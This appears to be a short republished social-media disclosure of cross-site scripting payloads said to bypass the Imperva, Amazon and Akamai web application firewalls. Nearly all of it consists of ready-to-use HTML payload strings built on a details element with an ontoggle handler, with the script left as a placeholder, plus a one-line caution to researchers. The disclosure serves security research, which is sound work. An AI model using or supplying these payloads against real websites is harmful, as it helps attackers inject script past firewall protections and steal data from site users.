WAF bypass by _shadowintel_

A XSS WAF Bypass affecting Imperva WAF has been disclosed. The bypass payload used is <details/open/id="&quote;"ontoggle=[JS]>. This payload successfully bypasses Imperva WAF. Security researchers should be aware of this vulnerability and take necessary precautions.

XSS WAF Bypass:

Imperva

<details/open/id="&quote;"ontoggle=[JS]>

Amazon

<details/open/id="&quote;"ontoggle=[JS]>

Akamai

<details open id="' &quote;'"ontoggle=[JS]>

— Ahmet Göker???? (@_shadowintel_) October 23, 2024